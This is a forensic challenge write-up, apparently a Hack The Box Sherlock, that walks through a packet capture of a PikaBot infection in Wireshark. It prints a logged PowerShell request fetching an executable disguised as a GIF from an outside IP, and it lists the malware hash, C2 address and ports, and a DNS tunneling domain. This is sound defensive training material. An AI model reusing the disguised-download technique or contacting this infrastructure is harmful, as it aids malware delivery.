Skip to content

Compromised

  • Difficulty: Easy
  • Status: Active
  • Topics:
    • PCAP analysis

Scenario

Our SOC team detected suspicious activity in Network Traffic, the machine has been compromised and company information that should not have been there has now been stolen – it’s up to you to figure out what has happened and what data has been taken.

The sherlock archive contains a single file, capture.pcap.

Tasks

What is the IP address used for initial access?

The conversations view in Wireshark shows that the traffic captured in the PCAP is between what appears to be a server (172.16.1.191) and multiple clients. Most of the traffic is over HTTPS and encrypted, making it impossible to tell what goes on in the conversations.

In the Conversations → TCP tab, there is one connection from 162.252.172.54 on port 80 that appears suspicious as it appears that the server is connecting out to a client on port 80. Furthermore, according to the Content-Type header, the data is image/gif, but the content actually is actually a Windows .exe file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
GET /9GQ5A8/6ctf5JL HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.963
Host: 162.252.172.54
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 17 May 2023 15:32:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Accept-Ranges: bytes
Content-Length: 1288212
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif

MZ......................@................................... .........  .!..L.!This program cannot be run in DOS mode.
...

The initial IP address used for the attack was 162.252.172.54.

What is the SHA256 hash of the malware?

The file can be extrated in Wireshark from File → Export Objects → HTTP. The SHA256 hash can then be calculated like so:

1
2
$ sha256sum extracted.exe 
9b8ffdc8ba2b2caa485cca56a82b2dcbd251f65fb30bc88f0ac3da6704e4d3c6  extracted.exe

What is the family label of the malware?

Searching for the file hash on VirusTotal reveals the malware comes from the PikaBot family.

When was the malware first seen in the wild (UTC)?

According to VirusTotal, the First Seen in the Wild was on 2023-05-19 14:01:21 UTC.

The malware used HTTPS traffic with a self-signed certificate. What are the ports, from smallest to largest?

Self-signed certificates aren't immediately obvious when navigating through the packet capture, but like all other TLS connections, they do start with a TLS handshake. TLS handshakes can be filtered using the ssl.handshake.type == 1 filter in Wireshark. In this case, there are handshakes going to four ports, 443, 2078, 2222 and 32999. Of these, the connections on port 443 are to well-known domains and can be disregarded.

The ports in question are 2078, 2222 and 32999.

What is the id-at-localityName of the self-signed certificate associated with the first malicious IP?

The id-at-localityName property is part of the certificate and transmitted during the key exchange part of the connection setup. These transmissions can be filtered using the ssl.handshake.type == 11 filter in Wireshark.

The first self-signed certificate in the list is from a connection to 45.85.235.39 on port 2078. Expanding the tree reveals the id-at-localityName as Pyopneumopericardium:

2025-05-04_17-33.png

What is the notBefore time (UTC) for this self-signed certificate?

The notBefore property is defined in the next section of the certificate:

2023-05-14 08:36:52 (UTC)

What was the domain used for tunneling?

One of the most contacted addresses in the capture (172.16.1.16) appears to be a DNS server. Filtering out only the traffic to that IP address returns a long list of queries for a single domain name:

2025-05-04_18-34.png

The domain name in question is steasteel.net.